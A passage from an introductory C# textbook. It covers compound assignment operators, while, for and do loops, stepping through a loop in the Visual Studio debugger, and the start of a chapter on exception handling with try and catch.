if (seconds == 59)
{
seconds = 0;
minutes++;
}
Associate different statements with
different values of a controlling
expression
Use a switch statement. For
example:
Click here to view code image
switch (current)
{
case 0:
...
break;
case 1:
...
break;
default :
...
break;
}
Download from finelybook [email protected]
200
CHAPTER 5
Using compound assignment and
iteration statements
After completing this chapter, you will be able to:
Update the value of a variable by using compound assignment
operators.
Write while, for, and do iteration statements.
Step through a do statement and watch as the values of variables
change.
Chapter 4, “Using decision statements,” demonstrates how to use the if and
switch constructs to run statements selectively. In this chapter, you’ll see how
to use a variety of iteration (or looping) statements to run one or more
statements repeatedly.
When you write iteration statements, you usually need to control the
number of iterations that you perform. You can achieve this by using a
variable, updating its value as each iteration is performed, and stopping the
process when the variable reaches a particular value. To help simplify this
process, you’ll start by learning about the special assignment operators that
you should use to update the value of a variable in these circumstances.
Using compound assignment operators
Download from finelybook [email protected]
201
You’ve already seen how to use arithmetic operators to create new values.
For example, the following statement uses the plus operator (+) to display to
the console a value that is 42 greater than the variable answer:
Console.WriteLine(answer + 42);
You’ve also seen how to use assignment statements to change the value of
a variable. The following statement uses the assignment operator (=) to
change the value of answer to 42:
answer = 42;
If you want to add 42 to the value of a variable, you can combine the
assignment operator and the plus operator. For example, the following
statement adds 42 to answer. After this statement runs, the value of answer is
42 more than it was before:
answer = answer + 42;
Although this statement works, you’ll probably never see an experienced
programmer write code like this. Adding a value to a variable is so common
that C# provides a way for you to perform this task in a shorthand manner by
using the operator +=. To add 42 to answer, you can write the following
statement:
answer += 42;
You can use this notation to combine any arithmetic operator with the
assignment operator, as the following table shows. These operators are
collectively known as the compound assignment operators.
Don’t write this
Write this
variable = variable * number;
variable *= number;
variable = variable / number;
variable /= number;
variable = variable % number;
variable %= number;
variable = variable + number;
variable += number;
Download from finelybook [email protected]
202
variable = variable - number;
variable -= number;
Tip The compound assignment operators share the same precedence
and right associativity as the simple assignment operator (=).
The += operator also works on strings; it appends one string to the end of
another. For example, the following code displays “Hello John” on the
console:
Click here to view code image
string name = "John";
string greeting = "Hello ";
greeting += name;
Console.WriteLine(greeting);
You cannot use any of the other compound assignment operators on
strings.
Tip Use the increment (++) and decrement (--) operators instead of a
compound assignment operator when incrementing or decrementing a
variable by 1. For example, replace
Click here to view code image
count += 1;
with
count++;
Writing while statements
Download from finelybook [email protected]
203
You use a while statement to run a statement repeatedly for as long as some
condition is true. The syntax of a while statement is as follows:
Click here to view code image
while ( booleanExpression )
statement
The Boolean expression (which must be enclosed in parentheses) is
evaluated, and if it is true, the statement runs and then the Boolean expression
is evaluated again. If the expression is still true, the statement is repeated, and
then the Boolean expression is evaluated yet again. This process continues
until the Boolean expression evaluates to false, at which point the while
statement exits. Execution then continues with the first statement that follows
the while statement. A while statement shares the following syntactic
similarities with an if statement (in fact, the syntax is identical except for the
keyword):
The expression must be a Boolean expression.
The Boolean expression must be written within parentheses.
If the Boolean expression evaluates to false when first evaluated, the
statement does not run.
If you want to perform two or more statements under the control of a
while statement, you must use braces to group those statements in a
block.
Here’s a while statement that writes the values 0 through 9 to the console.
Note that as soon as the variable i reaches the value 10, the while statement
finishes and the code in the statement block does not run:
Click here to view code image
int i = 0;
while (i < 10)
{
Console.WriteLine(i);
i++;
}
All while statements should terminate at some point. A common
beginner’s mistake is to forget to include a statement to cause the Boolean
expression eventually to evaluate to false and terminate the loop, which
Download from finelybook [email protected]
204
results in a program that runs forever. In the example, the statement i++;
performs this role.
Note The variable i in the while loop controls the number of iterations
that the loop performs. This is a common idiom, and the variable that
performs this role is sometimes called the sentinel variable. You can
also create nested loops (one loop inside another), and in these cases, it
is common to extend this naming pattern to use the letters j, k, and even
l as the names of the sentinel variables used to control the iterations in
these loops.
Tip As with if statements, it is recommended that you always use a
block with a while statement, even if the block contains only a single
statement. This way, if you decide to add more statements to the body
of the while construct later, it is clear that you should add them to the
block. If you don’t do this, only the first statement that immediately
follows the Boolean expression in the while construct will be executed
as part of the loop, resulting in difficult-to-spot bugs such as this:
Click here to view code image
int i = 0;
while (i < 10)
Console.WriteLine(i);
i++;
This code iterates forever, displaying an infinite number of zeros,
because only the Console.WriteLine statement—and not the i++;
statement—is executed as part of the while construct.
In the following exercise, you will write a while loop to iterate through the
Download from finelybook [email protected]
205
contents of a text file one line at a time and write each line to a text box in a
form.
Write a while statement
1. Using Microsoft Visual Studio 2017, open the WhileStatement solution,
which is located in the \Microsoft Press\VCSBS\Chapter
5\WhileStatement folder in your Documents folder.
2. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The application is a
simple text file viewer that you can use to select a text file and display
its contents.
3. Click Open File.
The Open File picker appears and displays the files in the Documents
folder, as shown in the following screenshot (the list of files and folders
might be different on your computer).
Download from finelybook [email protected]
206
You can use this dialog to move to a folder and select a file to display.
4. Move to the \Microsoft Press\VCSBS\Chapter
5\WhileStatement\WhileStatement folder in your Documents folder.
5. Select the file MainPage.xaml.cs, and then click Open.
The name of the file, MainPage.xaml.cs, appears in the text box at the
top of the form, but the contents of the file do not appear in the large text
box. This is because you have not yet implemented the code that reads
the contents of the file and displays it. You will add this functionality in
the following steps.
6. Return to Visual Studio 2017 and stop debugging.
7. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the openFileClick method.
This method runs when the user clicks the Open button to select a file in
the Open dialog box. It is not necessary for you to understand the exact
Download from finelybook [email protected]
207
details of how this method works at this point—simply accept the fact
that this method prompts the user for a file (using a FileOpenPicker or
OpenFileDialog window) and opens the selected file for reading.
The final two statements in the openFileClick method are important,
however. They look like this:
Click here to view code image
TextReader reader = new
StreamReader(inputStream.AsStreamForRead());
displayData(reader);
The first statement declares a TextReader variable called reader.
TextReader is a class provided by the Microsoft.NET Framework that
you can use for reading streams of characters from sources such as files.
It is located in the System.IO namespace. This statement makes the data
in the file specified by the user in the FileOpenPicker available to the
TextReader object, which can then be used to read the data from the file.
The final statement calls a method named displayData, passing reader
as a parameter to this method. The displayData method reads the data by
using the reader object and displays it on the screen (or it will do so
once you have written the code to accomplish this).
8. Examine the displayData method. It currently looks like this:
Click here to view code image
private void displayData(TextReader reader)
{
// TODO: add while loop here
}
You can see that, other than the comment, this method is currently
empty. This is where you need to add the code to fetch and display the
data.
9. Replace the // TODO: add while loop here comment with the following
statement:
source.Text = "";
The source variable refers to the large text box on the form. Setting its
Text property to the empty string (“”) clears any text that is currently
Download from finelybook [email protected]
208
displayed in this text box.
10. Add the following statement after the previous line that you added to the
displayData method:
string line = reader.ReadLine();
This statement declares a string variable called line and calls the
reader.ReadLine method to read the first line from the file into this
variable. This method returns either the next line of text from the file or
a special value called null when there are no more lines to read.
11. Add the following statements to the displayData method after the code
you have just entered:
Click here to view code image
while (line != null)
{
source.Text += line + '\n';
line = reader.ReadLine();
}
This is a while loop that iterates through the file one line at a time until
there are no more lines available.
The Boolean expression at the start of the while loop examines the value
in the line variable. If it is not null, the body of the loop displays the
current line of text by appending it to the Text property of the source
text box, together with a newline character (‘\n’—the ReadLine method
of the TextReader object strips out the newline characters as it reads
each line, so the code needs to add it back in again). The while loop then
reads in the next line of text before performing the next iteration. The
while loop finishes when there is no more text to read in the file, and the
ReadLine method returns a null value.
12. Type the following statement after the closing brace at the end of the
while loop:
reader.Dispose();
This statement releases the resources associated with the file and closes
it. This is good practice because it makes it possible for other
Download from finelybook [email protected]
209
applications to use the file and also frees up any memory and other
resources used to access the file.
13. On the Debug menu, click Start Debugging.
14. When the form appears, click Open File.
15. In the Open file picker, move to the \Microsoft Press\VCSBS\Chapter
5\WhileStatement\WhileStatement folder in your Documents folder,
select the file MainPage.xaml.cs, and then click Open.
Note Don’t try to open a file that does not contain text. If you
attempt to open an executable program or a graphics file, for
example, the application will simply display a text representation
of the binary information in this file. If the file is large, it might
hang the application, requiring you to terminate it forcibly.
This time, the contents of the selected file appear in the text box—you
should recognize the code that you have been editing. The following
image shows the application running:
Download from finelybook [email protected]
210
16. Scroll through the text in the text box and find the displayData method.
Verify that this method contains the code you just added.
17. Return to Visual Studio and stop debugging.
Writing for statements
In C#, most while statements have the following general structure:
Click here to view code image
initialization
while (Boolean expression)
{
statement
update control variable
}
The for statement in C# provides a more formal version of this kind of
construct by combining the initialization, Boolean expression, and code that
updates the control variable. You’ll find the for statement useful because in a
for statement, it is much harder to accidentally leave out the code that
initializes or updates the control variable, so you are less likely to write code
Download from finelybook [email protected]
211
that loops forever. Here is the syntax of a for statement:
Click here to view code image
for (initialization; Boolean expression; update control variable)
statement
The statement that forms the body of the for construct can be a single line
of code or a code block enclosed in braces.
You can rephrase the while loop shown earlier that displays the integers
from 0 through 9 as the following for loop:
Click here to view code image
for (int i = 0; i < 10; i++)
{
Console.WriteLine(i);
}
The initialization occurs just once, at the very beginning of the loop. Then,
if the Boolean expression evaluates to true, the statement runs. The control
variable update occurs, and then the Boolean expression is reevaluated. If the
condition is still true, the statement is executed again, the control variable is
updated, the Boolean expression is evaluated again, and so on.
Notice that the initialization occurs only once, that the statement in the
body of the loop always executes before the update occurs, and that the
update occurs before the Boolean expression reevaluates.
Tip As with the while statement, it is considered a good practice to
always use a code block even if the body of the for loop contains just a
single statement. If you add additional statements to the body of the for
loop later, this approach will help to ensure that your code is always
executed as part of each iteration.
You can omit any of the three parts of a for statement. If you omit the
Boolean expression, it defaults to true, so the following for statement runs
forever:
Download from finelybook [email protected]
212
Click here to view code image
for (int i = 0; ;i++)
{
Console.WriteLine("somebody stop me!");
}
If you omit the initialization and update parts, you have a strangely spelled
while loop:
Click here to view code image
int i = 0;
for (; i < 10; )
{
Console.WriteLine(i);
i++;
}
Note The initialization, Boolean expression, and update control variable
parts of a for statement must always be separated by semicolons, even
when they are omitted.
You can also provide multiple initializations and multiple updates in a for
loop. (You can have only one Boolean expression, though.) To achieve this,
separate the various initializations and updates with commas, as shown in the
following example:
Click here to view code image
for (int i = 0, j = 10; i <= j; i++, j--)
{
...
}
As a final example, here is the while loop from the preceding exercise
recast as a for loop:
Click here to view code image
for (string line = reader.ReadLine(); line != null; line =
reader.ReadLine())
{
Download from finelybook [email protected]
213
source.Text += line + '\n';
}
Understanding for statement scope
You might have noticed that you can declare a variable in the initialization
part of a for statement. That variable is scoped to the body of the for
statement and disappears when the for statement finishes. This rule has two
important consequences. First, you cannot use that variable after the for
statement has ended because it’s no longer in scope. Here’s an example:
Click here to view code image
for (int i = 0; i < 10; i++)
{
...
}
Console.WriteLine(i); // compile-time error
Second, you can write two or more for statements that reuse the same
variable name because each variable is in a different scope, as shown in the
following code:
Click here to view code image
for (int i = 0; i < 10; i++)
{
...
}
for (int i = 0; i < 20; i += 2) // okay
{
...
}
for (int i = 0; i < 10; i++)
{
...
}
for (int i = 0; i < 20; i += 2) // okay
{
...
}
Writing do statements
Download from finelybook [email protected]
214
Both the while and for statements test their Boolean expression at the
beginning of the loop. This means that if the expression evaluates to false on
the first test, the body of the loop does not run—not even once. The do
statement is different: its Boolean expression is evaluated after each iteration,
so the body always executes at least once.
The syntax of the do statement is as follows (don’t forget the final
semicolon):
Click here to view code image
do
statement
while (booleanExpression);
You must use a statement block if the body of the loop contains more than
one statement (the compiler will report a syntax error if you don’t). Here’s a
version of the example that writes the values 0 through 9 to the console, this
time constructed by using a do statement:
Click here to view code image
int i = 0;
do
{
Console.WriteLine(i);
i++;
}
while (i < 10);
The break and continue statements
In Chapter 4, you saw how to use the break statement to jump out of a
switch statement. You can also use a break statement to jump out of the
body of an iteration statement. When you break out of a loop, the loop
exits immediately, and execution continues at the first statement that
follows the loop. Neither the update nor the continuation condition of
the loop is rerun.
In contrast, the continue statement causes the program to perform the
next iteration of the loop immediately (after reevaluating the Boolean
expression). Here’s another version of the example that writes the
Download from finelybook [email protected]
215
values 0 through 9 to the console, this time using break and continue
statements:
Click here to view code image
int i = 0;
while (true)
{
Console.WriteLine(i);
i++;
if (i < 10)
continue;
else
break;
}
This code is absolutely ghastly. Many programming guidelines
recommend using continue cautiously or not at all because it is often
associated with hard-to-understand code. The behavior of continue is
also quite subtle. For example, if you execute a continue statement from
within a for statement, the update part runs before performing the next
iteration of the loop.
In the following exercise, you will write a do statement to convert a
positive decimal whole number to its string representation in octal notation.
The program is based on the following algorithm, which follows on a well-
known mathematical procedure:
Click here to view code image
store the decimal number in the variable dec
do the following
divide dec by 8 and store the remainder
set dec to the quotient from the previous step
while dec is not equal to zero
combine the values stored for the remainder for each calculation in
reverse order
For example, suppose that you want to convert the decimal number 999 to
octal. You perform the following steps:
1. Divide 999 by 8. The quotient is 124 and the remainder is 7.
2. Divide 124 by 8. The quotient is 15 and the remainder is 4.
Download from finelybook [email protected]
216
3. Divide 15 by 8. The quotient is 1 and the remainder is 7.
4. Divide 1 by 8. The quotient is 0 and the remainder is 1.
5. Combine the values calculated for the remainder at each step in reverse
order. The result is 1747. This is the octal representation of the decimal
value 999.
Write a do statement
1. Using Visual Studio 2017, open the DoStatement solution, which is
located in the \Microsoft Press\VCSBS\Chapter 5\DoStatement folder in
your Documents folder.
2. Display the MainPage.xaml form in the Design View window.
The form contains a text box called number in which the user can enter a
decimal number. When the user clicks the Show Steps button, the octal
representation of the number entered is generated. The text box to the
right, called steps, shows the results of each stage of the calculation.
3. Display the code for MainPage.xaml.cs in the Code and Text Editor
window and locate the showStepsClick method.
This method runs when the user clicks the Show Steps button on the
form. Currently, it is empty.
4. Add the following statements shown in bold to the showStepsClick
method:
Click here to view code image
private void showStepsClick(object sender, RoutedEventArgs e)
{
int amount = int.Parse(number.Text);
steps.Text = "";
string current = "";
}
The first statement converts the string value in the Text property of the
number text box into an int by using the Parse method of the int type
and stores it in a local variable called amount.
The second statement clears the text displayed in the lower text box by
Download from finelybook [email protected]
217
setting its Text property to the empty string.
The third statement declares a string variable called current and
initializes it to the empty string. You will use this string to store the
digits generated at each iteration of the loop that is used to convert the
decimal number to its octal representation.
5. Add the following do statement (shown in bold) to the showStepsClick
method:
Click here to view code image
private void showStepsClick(object sender, RoutedEventArgs e)
{
int amount = int.Parse(number.Text);
steps.Text = "";
string current = "";
do
{
int nextDigit = amount % 8;
amount /= 8;
int digitCode = '0' + nextDigit;
char digit = Convert.ToChar(digitCode);
current = digit + current;
steps.Text += current + "\n";
}
while (amount != 0);
}
The algorithm used here repeatedly performs integer arithmetic to divide
the amount variable by 8 and determine the remainder. The remainder
after each successive division constitutes the next digit in the string
being built. Eventually, when amount is reduced to 0, the loop finishes.
Notice that the body must run at least once. This behavior is exactly
what is required because even the number 0 has one octal digit.
Look more closely at the code; you will see that the first statement
executed by the do loop is this:
int nextDigit = amount % 8;
This statement declares an int variable called nextDigit and initializes it
to the remainder after dividing the value in amount by 8. This will be a
number somewhere between 0 and 7.
Download from finelybook [email protected]
218
The next statement in the do loop is
amount /= 8;
This is a compound assignment statement and is equivalent to writing
amount = amount / 8;. If the value of amount is 999, the value of
amount after this statement runs is 124.
The next statement is this:
int digitCode = '0' + nextDigit;
This statement requires a little explanation. Characters have a unique
code according to the character set used by the operating system. In the
character sets frequently used by the Windows operating system, the
code for character “0” has integer value 48. The code for character “1” is
49, the code for character “2” is 50, and so on, up to the code for
character “9,” which has integer value 57. With C#, you can treat a
character as an integer and perform arithmetic on it, but when you do so,
C# uses the character’s code as the value. So the expression ‘0’ +
nextDigit actually results in a value somewhere between 48 and 55
(remember that nextDigit will be between 0 and 7), corresponding to the
code for the equivalent octal digit.
The fourth statement in the do loop is
Click here to view code image
char digit = Convert.ToChar(digitCode);
This statement declares a char variable called digit and initializes it to
the result of the Convert.ToChar(digitCode) method call. The
Convert.ToChar method takes an integer holding a character code and
returns the corresponding character. So, for example, if digitCode has
the value 54, Convert.ToChar(digitCode) returns the character ‘6’.
To summarize, the first four statements in the do loop have determined
the character representing the least-significant (rightmost) octal digit
corresponding to the number the user entered. The next task is to
prepend this digit to the string to be output, like this:
current = digit + current;
Download from finelybook [email protected]
219
The next statement in the do loop is this:
steps.Text += current + "\n";
This statement adds to the steps text box the string containing the digits
produced so far for the octal representation of the number. It also
appends a newline character so that each stage of the conversion appears
on a separate line in the text box.
Finally, the condition in the while clause at the end of the loop is
evaluated:
while (amount != 0);
Because the value of amount is not yet 0, the loop performs another
iteration.
In the final exercise of this chapter, you will use the Visual Studio 2017
debugger to step through the previous do statement to help you understand
how it works.
Step through the do statement
1. In the Code and Text Editor window displaying the MainPage.xaml.cs
file, move the cursor to the first statement of the showStepsClick
method:
Click here to view code image
int amount = int.Parse(number.Text);
2. Right-click anywhere in the first statement, and then click Run To
Cursor.
3. When the form appears, type 999 in the number text box on the left, and
then click Show Steps.
The program stops, and you are placed in Visual Studio 2017 debug
mode. A yellow arrow in the left margin of the Code and Text Editor
window and yellow highlighting on the code indicates the current
statement.
4. In the window below the Code and Text Editor window, click the Locals
Download from finelybook [email protected]
220
tab, as highlighted in the following image.
The Locals window displays the name, value, and type of the local
variables in the current method, including the amount local variable.
Notice that the value of amount is currently 0.
5. Display the Debug toolbar if it is not visible. (On the View menu, point
to Toolbars, and then click Debug.)
Download from finelybook [email protected]
221
Note The commands on the Debug toolbar are also available on
the Debug menu displayed on the menu bar.
6. On the Debug toolbar, click the Step Into button.
The debugger runs the following statement:
int amount = int.Parse(number.Text);
The value of amount in the Locals window changes to 999, and the
yellow arrow moves to the next statement.
7. Click Step Into again.
The debugger runs this statement:
steps.Text = "";
This statement does not affect the Locals window because steps is a
control on the form and not a local variable. The yellow arrow moves to
the next statement.
8. Click Step Into.
The debugger runs the statement shown here:
string current = "";
The yellow arrow moves to the opening brace at the start of the do loop.
The do loop contains three local variables of its own: nextDigit,
digitCode, and digit. Notice that these local variables now appear in the
Locals window. The value of all three variables is initially set to 0.
9. Click Step Into.
The yellow arrow moves to the first statement within the do loop.
10. Click Step Into.
Download from finelybook [email protected]
222
The debugger runs the following statement:
int nextDigit = amount % 8;
The value of nextDigit in the Locals window changes to 7. This is the
remainder after dividing 999 by 8.
11. Click Step Into.
The debugger runs this statement:
amount /= 8;
The value of amount changes to 124 in the Locals window.
12. Click Step Into.
The debugger runs this statement:
int digitCode = '0' + nextDigit;
The value of digitCode in the Locals window changes to 55. This is the
character code of the character “7” (48 + 7).
13. Click Step Into.
The debugger continues to this statement:
char digit = Convert.ToChar(digitCode);
The value of digit changes to “7” in the Locals window. The Locals
window shows char values using both the underlying numeric value (in
this case, 55) and also the character representation (“7”).
Note that in the Locals window, the value of the current variable is still
“”.
14. Click Step Into.
The debugger runs the following statement:
current = current + digit;
The value of current changes to “7” in the Locals window.
Download from finelybook [email protected]
223
15. Click Step Into.
The debugger runs the statement shown here:
steps.Text += current + "\n";"
This statement displays the text “7” in the steps text box, followed by a
newline character to cause subsequent output to be displayed on the next
line in the text box. (The form is currently hidden behind Visual Studio,
so you won’t be able to see it.) The cursor moves to the closing brace at
the end of the do loop.
16. Click Step Into.
The yellow arrow moves to the while statement to evaluate whether the
do loop has completed or whether it should continue for another
iteration.
17. Click Step Into.
The debugger runs this statement:
while (amount != 0);
The value of amount is 124, the expression 124 != 0 evaluates to true,
so the do loop performs another iteration. The yellow arrow jumps back
to the opening brace at the start of the do loop.
18. Click Step Into.
The yellow arrow moves to the first statement within the do loop again.
19. Repeatedly click Step Into to step through the next three iterations of the
do loop and watch how the values of the variables change in the Locals
window.
20. At the end of the fourth iteration of the loop, the value of amount is 0
and the value of current is “1747”. The yellow arrow is on the while
condition at the end of the do loop:
while (amount != 0);
Because the value of amount is now 0, the expression amount != 0
Download from finelybook [email protected]
224
evaluates to false, and the do loop should terminate.
21. Click Step Into.
The debugger runs the following statement:
while (amount != 0);
As predicted, the do loop finishes, and the yellow arrow moves to the
closing brace at the end of the showStepsClick method.
22. On the Debug menu, click Continue.
The form appears, displaying the four steps used to create the octal
representation of 999: 7, 47, 747, and 1747.
23. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
Summary
In this chapter, you learned how to use the compound assignment operators to
Download from finelybook [email protected]
225
update numeric variables and append one string to another. You saw how to
use while, for, and do statements to execute code repeatedly while some
Boolean condition is true.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 6, “Managing errors and exceptions.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Add an amount to a variable
Use the compound addition
operator. For example:
variable += amount;
Subtract an amount from a variable
Use the compound subtraction
operator. For example:
variable -= amount;
Run one or more statements zero or more
times while a condition is true
Use a while statement. For
example:
Click here to view code image
int i = 0; while (i < 10)
{
Console.WriteLine(i);
i++;
}
Alternatively, use a for
statement. For example:
Click here to view code image
for (int i = 0; i < 10; i++)
{
Console.WriteLine(i);
}
Download from finelybook [email protected]
226
Repeatedly execute statements one or
more times
Use a do statement. For
example:
Click here to view code image
int i = 0;
do
{
Console.WriteLine(i);
i++;
}
while (i < 10);
Download from finelybook [email protected]
227
CHAPTER 6
Managing errors and exceptions
After completing this chapter, you will be able to:
Handle exceptions by using the try, catch, and finally statements.
Control integer overflow by using the checked and unchecked
keywords.
Raise exceptions from your own methods by using the throw keyword.
Ensure that code always runs, even after an exception has occurred, by
using a finally block.
You have now seen the core C# statements that you need to know to
perform common tasks such as writing methods, declaring variables, using
operators to create values, writing if and switch statements to run code
selectively, and writing while, for, and do statements to run code repeatedly.
However, the previous chapters haven’t considered the possibility (or
probability) that things can go wrong.
It is very difficult to ensure that a piece of code always works as expected.
Failures can occur for a large number of reasons, many of which are beyond
your control as a programmer. Any applications that you write must be
capable of detecting failures and gracefully handling them, either by taking
the appropriate corrective actions or, if that is not possible, by reporting the
reasons for the failure in the clearest possible way to the user. In this final
chapter of Part I, you’ll learn how C# uses exceptions to signal that an error
has occurred and how to use the try, catch, and finally statements to catch and
handle the errors that these exceptions represent.
Download from finelybook [email protected]
228
By the end of this chapter, you’ll have a solid foundation in all the
fundamental elements of C#, and you will build on this foundation in Part II.
Coping with errors
It’s a fact of life that bad things sometimes happen. Tires are punctured,
batteries run down, screwdrivers are never where you left them, and users of
your applications behave in unpredictable ways. In the world of computers,
hard disks become corrupt, other applications running on the same computer
as your program run amok and use up all the available memory, wireless
network connections disappear at the most awkward moment, and even
natural phenomena such as a nearby lightning strike can have an impact if it
causes a power outage or network failure. Errors can occur at almost any
stage when a program runs, and many errors might not actually be the fault of
your own application, so how do you detect them and attempt to recover?
Over the years, a number of mechanisms have evolved. A typical
approach adopted by older systems such as UNIX involved arranging for the
operating system to set a special global variable whenever a method failed.
Then, after each call to a method, you checked the global variable to see
whether the method succeeded. C# and most other modern object-oriented
languages don’t handle errors in this manner; it’s just too painful. Instead,
they use exceptions. If you want to write robust C# programs, you need to
know about exceptions.
Trying code and catching exceptions
Errors can happen at any time, and using traditional techniques to manually
add error-detecting code around every statement is cumbersome, time-
consuming, and error-prone in its own right. You can also lose sight of the
main flow of an application if each statement requires contorted error-
handling logic to manage each possible error that can occur at every stage.
Fortunately, C# makes it easy to separate the error-handling code from the
code that implements the primary logic of a program by using exceptions and
exception handlers. To write exception-aware programs, you need to do two
things:
Download from finelybook [email protected]
229
Write your code within a try block (try is a C# keyword). When the
code runs, it attempts to execute all the statements in the try block, and
if none of the statements generates an exception, they all run, one after
the other, to completion. However, if an error condition occurs,
execution jumps out of the try block and into another piece of code
designed to catch and handle the exception—a catch handler.
Write one or more catch handlers (catch is another C# keyword)
immediately after the try block to handle any possible error conditions.
A catch handler is intended to capture and handle a specific type of
exception, and you can have multiple catch handlers after a try block,
each one designed to trap and process a specific exception. This
enables you to provide different handlers for the different errors that
could arise in the try block. If any one of the statements within the try
block causes an error, the runtime throws an exception. The runtime
then examines the catch handlers after the try block and transfers
control directly to the first matching handler.
Here’s an example of a try block that contains code that attempts to
convert strings that a user has typed in some text boxes on a form to integer
values. The code then calls a method to calculate a value and writes the result
to another text box. Converting a string to an integer requires that the string
contain a valid set of digits and not some arbitrary sequence of characters. If
the string contains invalid characters, the int.Parse method throws a
FormatException and execution transfers to the corresponding catch handler.
When the catch handler finishes, the program continues with the first
statement that follows the handler. Note that if no handler corresponds to the
exception, the exception is said to be unhandled (this situation will be
described shortly).
Click here to view code image
try
{
int leftHandSide = int.Parse(lhsOperand.Text);
int rightHandSide = int.Parse(rhsOperand.Text);
int answer = doCalculation(leftHandSide, rightHandSide);
result.Text = answer.ToString();
}
catch (FormatException fEx)
{
// Handle the exception
...
Download from finelybook [email protected]
230
}
A catch handler employs syntax similar to that used by a method
parameter to specify the exception to be caught. In the preceding example,
when a FormatException is thrown, the fEx variable is populated with an
object containing the details of the exception.
The FormatException type has a number of properties that you can
examine to determine the exact cause of the exception. Many of these
properties are common to all exceptions. For example, the Message property
contains a text description of the error that caused the exception. You can use
this information when handling the exception, perhaps recording the details
in a log file or displaying a meaningful message to the user and then asking
the user to try again.
Unhandled exceptions
What happens if a try block throws an exception and there is no
corresponding catch handler? In the previous example, it is possible that the
lhsOperand text box could contain the string representation of a valid integer
but the integer it represents is outside the range of valid integers supported by
C# (for example, “2147483648”). In this case, the int.Parse statement would
throw an OverflowException, which will not be caught by the
FormatException catch handler. If this occurs and the try block is part of a
method, the method immediately exits and execution returns to the calling
method. If the calling method uses a try block, the runtime attempts to locate
and execute a matching catch handler for this try block. If the calling method
does not use a try block or if there is no matching catch handler, the calling
method immediately exits, and execution returns to its caller, where the
process is repeated. If a matching catch handler is eventually found, the
handler runs and execution continues with the first statement that follows the
catch handler in the catching method.
Important Notice that after catching an exception, execution continues
in the method containing the catch block that caught the exception. If
the exception occurred in a method other than the one containing the
Download from finelybook [email protected]
231
catch handler, control does not return to the method that caused the
exception.
If, after cascading back through the list of calling methods, the runtime is
unable to find a matching catch handler, the program will terminate with an
unhandled exception.
You can easily examine exceptions generated by your application. If you
are running the application in Microsoft Visual Studio 2017 in debug mode
(that is, on the Debug menu you selected Start Debugging to run the
application) and an exception occurs, a dialog box similar to the one shown
in the following image appears and the application pauses, helping you to
determine the cause of the exception:
The application stops at the statement that caused the exception and drops
you into the debugger. There you can examine the values of variables, you
can change the values of variables, and you can step through your code from
the point at which the exception occurred by using the Debug toolbar and the
Download from finelybook [email protected]
232
various debug windows.
Using multiple catch handlers
The previous discussion highlighted how different errors throw different
kinds of exceptions to represent different kinds of failures. To cope with
these situations, you can supply multiple catch handlers, one after the other,
such as in the following:
Click here to view code image
try
{
int leftHandSide = int.Parse(lhsOperand.Text);
int rightHandSide = int.Parse(rhsOperand.Text);
int answer = doCalculation(leftHandSide, rightHandSide);
result.Text = answer.ToString();
}
catch (FormatException fEx)
{
//...
}
catch (OverflowException oEx)
{
//...
}
If the code in the try block throws a FormatException exception, the
statements in the catch block for the FormatException exception run. If the
code throws an OverflowException exception, the catch block for the
OverflowException exception runs.
Note If the code in the FormatException catch block generates an
OverflowException exception, it does not cause the adjacent
OverflowException catch block to run. Instead, the exception
propagates to the method that invoked this code, as described earlier in
this section.
Download from finelybook [email protected]
233
Catching multiple exceptions
The exception-catching mechanism provided by C# and the Microsoft .NET
Framework is quite comprehensive. The .NET Framework defines many
types of exceptions, and any programs you write can throw most of them. It
is highly unlikely that you will want to write catch handlers for every
possible exception that your code can throw—remember that your application
must be able to handle exceptions that you never even considered when you
wrote it! So, how do you ensure that your programs catch and handle all
possible exceptions?
The answer to this question lies in the way the different exceptions are
related to one another. Exceptions are organized into families called
inheritance hierarchies. (You will learn about inheritance in Chapter 12,
“Working with inheritance.”) FormatException and OverflowException both
belong to a family called SystemException, as do a number of other
exceptions. SystemException is itself a member of a wider family simply
called Exception, and this is the great-granddaddy of all exceptions. If you
catch Exception, the handler traps every possible exception that can occur.
Note The Exception family includes a wide variety of exceptions, many
of which are intended for use by various parts of the .NET Framework.
Some of these exceptions are somewhat esoteric, but it is still useful to
understand how to catch them.
The next example shows how to catch all possible exceptions:
Click here to view code image
try
{
int leftHandSide = int.Parse(lhsOperand.Text);
int rightHandSide = int.Parse(rhsOperand.Text);
int answer = doCalculation(leftHandSide, rightHandSide);
result.Text = answer.ToString();
}
catch (Exception ex) // this is a general catch handler
Download from finelybook [email protected]
234
{
//...
}
Note If you want to catch Exception, you can actually omit its name
from the catch handler because it is the default exception:
Click here to view code image
catch
{
// ...
}
However, this is not recommended. The exception object passed to
the catch handler can contain useful information concerning the
exception, which is not easily accessible when using this version of the
catch construct.
There is one final question you should be asking at this point: What
happens if the same exception matches multiple catch handlers at the end of a
try block? If you catch FormatException and Exception in two different
handlers, which one will run? (Or will both execute?)
When an exception occurs, the runtime uses the first handler it finds that
matches the exception and the others are ignored. This means that if you
place a handler for Exception before a handler for FormatException, the
FormatException handler will never run. Therefore, you should place more
specific catch handlers above a general catch handler after a try block. If
none of the specific catch handlers matches the exception, the general catch
handler will.
Filtering exceptions
You can filter the exceptions that are matched against catch handlers, to
ensure that the exception handler is triggered only when additional conditions
are met. These conditions take the form of a Boolean expression prefixed by
Download from finelybook [email protected]
235
the when keyword. The following example illustrates the syntax:
Click here to view code image
bool catchErrors = ...;
try
{
...
}
catch (Exception ex) when (catchErrors == true)
{
// Only handle exceptions if the catchErrors variable is true
}
This example catches all exceptions (the Exception type) depending on the
value of the catchErrors boolean variable; if this variable is false, then no
exception handling occurs, and the default exception handling mechanism for
the application is used. If catchErrors is true, then the code in the catch block
runs to handle the exception.
In the following exercises, you will see what happens when an application
throws an unhandled exception, and then you will write a try block to catch
and handle an exception.
Observe how the application reports unhandled exceptions
1. Start Visual Studio 2017, if it is not already running.
2. Open the MathsOperators solution, which is located in the \Microsoft
Press\VCSBS\Chapter 6\MathsOperators folder in your Documents
folder.
This is a version of the program from Chapter 2, “Working with
variables, operators, and expressions,” that demonstrates the different
arithmetic operators.
3. On the Debug menu, click Start Without Debugging.
Note For this exercise, ensure that you actually run the application
without debugging.
Download from finelybook [email protected]
236
The form appears. You are now going to enter some text in the Left
Operand box that will cause an exception. This operation will
